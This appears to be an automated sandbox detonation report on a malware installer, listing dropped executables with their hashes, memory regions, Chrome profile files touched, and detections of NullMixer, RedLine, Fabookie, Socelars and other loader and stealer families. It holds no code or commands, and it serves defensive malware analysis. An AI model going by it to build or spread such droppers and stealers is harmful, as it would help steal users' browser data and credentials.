SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1752-99-0x0000000000D20000-0x0000000000D28000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

memory/3180-106-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/4552-112-0x0000000005280000-0x00000000058A8000-memory.dmp

memory/1256-114-0x0000000004C60000-0x0000000004CD6000-memory.dmp

memory/1256-113-0x0000000000530000-0x0000000000598000-memory.dmp

memory/4552-105-0x0000000002720000-0x0000000002756000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

memory/2384-95-0x0000000001080000-0x0000000001086000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/2384-93-0x0000000000AD0000-0x0000000000AE8000-memory.dmp

memory/1256-116-0x0000000004C40000-0x0000000004C5E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/4552-121-0x00000000059D0000-0x0000000005A36000-memory.dmp

memory/4552-120-0x0000000005960000-0x00000000059C6000-memory.dmp

memory/4552-124-0x0000000005A40000-0x0000000005D94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zrsd05bj.4zi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\is-NGUFH.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/4552-119-0x0000000005180000-0x00000000051A2000-memory.dmp

memory/1256-150-0x0000000005470000-0x0000000005A14000-memory.dmp

memory/4940-155-0x0000000000400000-0x0000000000414000-memory.dmp

memory/512-158-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3180-162-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-M37VB.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4552-174-0x0000000006020000-0x000000000603E000-memory.dmp

memory/4552-175-0x0000000006460000-0x00000000064AC000-memory.dmp

memory/4284-176-0x0000000000400000-0x0000000000883000-memory.dmp

memory/4552-186-0x000000006CF00000-0x000000006CF4C000-memory.dmp

memory/4552-197-0x0000000007010000-0x00000000070B3000-memory.dmp

memory/4552-196-0x0000000006FF0000-0x000000000700E000-memory.dmp

memory/4552-185-0x00000000065E0000-0x0000000006612000-memory.dmp

memory/4988-200-0x000000006CF00000-0x000000006CF4C000-memory.dmp

memory/4552-199-0x0000000007370000-0x000000000738A000-memory.dmp

memory/4552-198-0x00000000079B0000-0x000000000802A000-memory.dmp

memory/4552-210-0x00000000073F0000-0x00000000073FA000-memory.dmp

memory/4552-211-0x00000000075E0000-0x0000000007676000-memory.dmp

memory/4552-212-0x0000000007570000-0x0000000007581000-memory.dmp

memory/3028-217-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat1427fbafcf251.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/3028-218-0x00000000057C0000-0x0000000005DD8000-memory.dmp

memory/3028-220-0x00000000054D0000-0x00000000055DA000-memory.dmp

memory/3028-219-0x00000000053A0000-0x00000000053B2000-memory.dmp

memory/3028-221-0x0000000005400000-0x000000000543C000-memory.dmp

memory/4988-222-0x0000000007A80000-0x0000000007A8E000-memory.dmp

memory/4988-223-0x0000000007A90000-0x0000000007AA4000-memory.dmp

memory/4552-224-0x00000000076A0000-0x00000000076BA000-memory.dmp

memory/4988-225-0x0000000007B70000-0x0000000007B78000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cba636b8475d274b99bf4cb9c7529cb3
SHA1 574e6c41a693800bb8c9cd881534357d044aa078
SHA256 5f53e1fe83c34e21d04eae200ea71aeff0f3093f0f59abd963f7dee62197bce7
SHA512 4b87ed743c878c37ef122ff181fbf32a023cbb3cbf0a252e457158a1d512a68760987c6e772c4c6b5b6202122c578ee7d4f9e98fd6145e602167b5952248a17e

C:\Users\Admin\AppData\Local\Temp\PajLCM.4

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\lkyqBUE.m

MD5 ce2da93761dc1ddb916fd1474c2a4e8f
SHA1 5d04fad0fd8df47a2cf322288a9ef5bbe85a783c
SHA256 c5284035228617e55e3ddb94d5900a0a460d292ad121b8ad6f0c10497a700673
SHA512 77f4dfa33e102f0b3d94a167413f3ef30dcd522d4a3c000203521449e385bba4b5691f38408e75b378cc62d9fed98b460e6e1daa0251332aa9105d52d54a5b44

C:\Users\Admin\AppData\Local\Temp\vuR_hcMP.3T

MD5 c7d6c3ce016c46c94cfcda0c814f2889
SHA1 a552326f590bbf8d2f9a69a23863cefd83ff9687
SHA256 733e5e284c182b6de7e2d287a4b12722cfba8c393dd82bb11c766cbe5b94bb43
SHA512 6c6e7538a0f5c91be742caaab91cc3e87f8574a2a492831015f16d8e01e3fb9a9f11abc3155b4c573c7305e4057ce6013f2cbf4dd710b4a2773339790ea97a08

C:\Users\Admin\AppData\Local\Temp\9h1gI_ny.t

MD5 719406c6176706f60d8f511ce6096c2d
SHA1 5044cc1af74e9d762feabdfe1fa46ad558249a65
SHA256 53642a2d499eb8bc9fdc9c27344436dc5989f9f493c4d21648172b7110e906a0
SHA512 9c00fda0639daaae2882f2932ab8e1b29403b9434473bb34f10d229b33f68d973f1a8b73968b7386ad9d4551cad6cb8ec86c1f45fa57637e0cfcae0c7b0b911e

C:\Users\Admin\AppData\Local\Temp\i5glXU.q

MD5 df345237695fb3974d0adb7ba892db7b
SHA1 4f6904679510f87b4e3df83e4c1f3804cb4aa773
SHA256 76a22ff20b5a218c06469f45c87209471b7f5f33fb680ed539efb090c1632bad
SHA512 bf43ae459535b92f739413aeee3cdb8f27ace4e0009024e0381b13632e1dbc23df667eab924959c43b805b1305dabe6caaf88785fb0ab1d45544d9d46ba7d50e

C:\Users\Admin\AppData\Local\Temp\U9bIuq0J.~dW

MD5 dcb29594703e229efa20bedff41fe3e6
SHA1 7473bf4265ce63a48d46f76af3a709eeb89e5363
SHA256 f0f3e4ac0575c8cca414c05075dc4ec3f9fa987a63942d5ec222758eadca2331
SHA512 bd8e007cc26bf03d202c6cd6a5655d3aebef4ac61e39306fa139f52e1bb051a29c7d088fac3717c57ec23fea6be7260c1d1917a9c76f6bb2c207b2d10b68f982

C:\Users\Admin\AppData\Local\Temp\2KSA.Gf7

MD5 2bb9a6e280c2467a3a41b63b19c6a9c9
SHA1 5ee46160ee267fcb2ec037040b78aaaa95e48669
SHA256 2ecbc1aa01a7c8ba6ea0b0f8cccb6bd349230e5e09f3e75acebd0760e231f540
SHA512 7c87976a34da4747ce3dafd991fa527d37c1ee7854e0645478334bf9677cc7493adce35b4bd32dc0276049e5431c8b5b2220813d063fc963dc24814dd5565461

memory/1852-254-0x0000000002440000-0x00000000025E8000-memory.dmp

memory/3476-267-0x0000000064940000-0x0000000064959000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 605b50d3a433c4ce3111c0aed99efc71
SHA1 bd1852cdfe9282965cf68ecaedcaa1a880e44f63
SHA256 4d461bbc08f1710b05723f7cf0499d483013c3bae2efc8415b25fed4dc8f8396
SHA512 dea6a503a52c3d459e04963687cc18ad59fd103b1c0decdf4f834974e714fce524267452669e9b4b892ea7b1a26e1c2624a1f92c1d0bfad60aec8b7a5bcbb21e

\??\pipe\crashpad_740_ZCVIJYOUEZQYRCTX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1852-278-0x00000000028B0000-0x0000000002955000-memory.dmp

memory/3476-285-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3476-287-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3476-286-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3476-284-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4392-288-0x0000000000400000-0x000000000089C000-memory.dmp

memory/3476-282-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3476-298-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3476-297-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3476-296-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3476-295-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3476-293-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3476-289-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1852-302-0x0000000002960000-0x00000000029F2000-memory.dmp

memory/1852-299-0x0000000002960000-0x00000000029F2000-memory.dmp

memory/4940-303-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4500-304-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/1852-310-0x0000000002440000-0x00000000025E8000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 2718c0750e91c110512405c44f13e2aa
SHA1 2511ef2c6db9cc74972ba5f2e7e025b6e721afac
SHA256 9d3f0ebbae1cb81ea475ba5d2cd938b3230917a68004215c656ff125676711a8
SHA512 cb81d1a28118948b1d5add854bf073d2829be3b22a103e92dfce2cc21c5acbe30282e671edf31edb6d99c6d77ccaf2c7decd6e40dc5ca9ec696b2e0027b9261f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 97236fdb9f4d29f88f474c906b439d08
SHA1 d45d422989f628d29b61c1e5e822c54a936f1927
SHA256 8344173f0a1658f2b27ea0d3816aaea2e5be3e745fc0dd9b7743d767a5f9679c
SHA512 0d93910ac983fd636a4546335279142072e09e0c99f3a8f18edbcef87178c7e63275b0e2e71b09fd5040da8b5825804c3b67d6b939abda74db7eb7dcae98364e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 5af117d536431320eb5550efcd4fdaab
SHA1 7638d2d024cc8f15019fc1207b42744a8ce2d7e1
SHA256 efdcfec7756dd90605dc2c91cbca048d7308e033c288d2b8098fc9f3a744f59c
SHA512 a21656f51cb1c95c45c27b67932ecd044a56144ccf7b735e841a5ee1b937d5b463521c3c8b035ce4bf0ada4274a7813c3e3875c880103793575fc683d258720d

memory/4392-337-0x0000000000400000-0x000000000089C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 36e6e3aed9cf36e5cbf572f21c8a0279
SHA1 89106ab5120e5c794dbc32e7f51affcff70994da
SHA256 799cdf3785c64107ab23d3a45730d0004b8a0182fdf2af75a47a661c273c3b3d
SHA512 c524642a682d7da568c7f26af49a0a1a0759560bff177c44284bf61760f3ea4ff54ecb9d72cb5f20befe6f73f2dfdd18998648cdfb42741e8b5ed9dbbc56509f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 0e262ad4079a7822c81f792b8a61597b
SHA1 bc09dbb28064217354071da7a6acf493dedc622f
SHA256 a6543ef34faf0b06bbacbedbfeaac679701432e0bfb76fbe38c20627fce8b264
SHA512 6f7dffad669535f41e4a05b559ac92ba09cb9bdce77ee8a1895b2f7d27e316c24cf687b744a1279f793ff11055260df65d838f82cc4b4f1415e413b51b792ed0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a2a08db84e0793ecf87f96a86f01c31b
SHA1 d4e799fc33060cde8472c051031a04b9a461fffa
SHA256 727eca281ff2a66cfbd826c00b977fe33cc1d1a4c30adce1dac9f5f1ccf990c1
SHA512 31018b1c32c59843d9612d2da9996d7c54d0322bdfc45493d82b671e383aeea9a931ee1e56482ec0e45111c40d9943ece0f0b29bdeeaace6ecc749b5eef1f505

memory/1852-372-0x0000000002960000-0x00000000029F2000-memory.dmp

memory/1852-373-0x0000000002A00000-0x00000000047AF000-memory.dmp

memory/1852-374-0x00000000047B0000-0x000000000483C000-memory.dmp

memory/1852-376-0x0000000004840000-0x00000000048C9000-memory.dmp

memory/1852-375-0x0000000004840000-0x00000000048C9000-memory.dmp

memory/1852-378-0x0000000004840000-0x00000000048C9000-memory.dmp

memory/1852-379-0x0000000000070000-0x0000000000071000-memory.dmp

memory/1852-380-0x0000000000080000-0x0000000000084000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 bc0f8ba8aeda655154eccfd8a70a41a3
SHA1 ebb41abdecdceaf1394997f59aa4797d762f9b45
SHA256 8a0fe2f2d2f0b59af5b217271f8951c142958f03a6602ae7a4c0db517d5a483c
SHA512 fbce3c165153c04b8d391425349efcd1d8f6295082594cc90fe0d569d3bef8401eb04738050b7a6602eb189764cde80e98724f7d18c4717cb3140024096492e4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 155f6ff7934fcd233dd67f33ab46843b
SHA1 01d44811bb1eabad38c259b4036dd3f19ad7942f
SHA256 769fa5e7c01fc141d7c990a86fe9c473214f83f381c3197a422924d2c0c49a3a
SHA512 99e25c59a4f514cf49e4a7cd3540084b72dc30c942d5774c3d2fd87078aebe8ea9086d48c823f92b56ab3479ae1c8e743ce70679522597649f5119efaf3ac45e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 119b9b94953b94414ae355aece405640
SHA1 611758493a3c3f14236e2da14ec2812c40703c40
SHA256 d27e43075f2931f73b2c530b733fcfe4cea68ef9eeae62b5e71871e7f58486c4
SHA512 54f2c2d8ef6957d278dbfd1d57d3c8067534f4f7397acef95315581ad7dccef7bb353e6002add42ced646344fcaafc4aacdfa43fd3cabf9d64081a9574185e80

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 d94a18542aad329fcb2b442299be15c4
SHA1 6ed51a75214c36e124c43e0927427278900ba9e6
SHA256 fdd35bde2eb6ffe4643c5601fd36f85afed944bf62a048ac0664d11f54c7772c
SHA512 ba554cb5ece32c0ed9fdc6eba19f2246d4e105992edadbc706eaa19e4e080efadd95e946b2bb30fc6fbf6699580b449254cf457c205080411104d94cfdc861a5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\b70a43b9-e948-4eb8-bb16-c2c727e27df8.tmp

MD5 70bbd6e775891ce7e51d27509e9f1180
SHA1 8c9b74a579024d4ff95932bffdd0515d24bd687b
SHA256 271276b3f48e0b6861a4d59885cb81603548654312b2e1cf1ac18052b0963aab
SHA512 7cbe041b4ff9822e323a6e147cb2d8255408b5760b8c7a94ccaee09dff58650524776eb061766fd147aa3c75bd6d100f1192f3253c55c2238524e1647d80402b

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-23 18:38

Reported

2024-11-23 18:40

Platform

win7-20241010-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat144474a564d26f29.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LQ6OA.tmp\Sat1481f5a7e3eccdd.tmp N/A
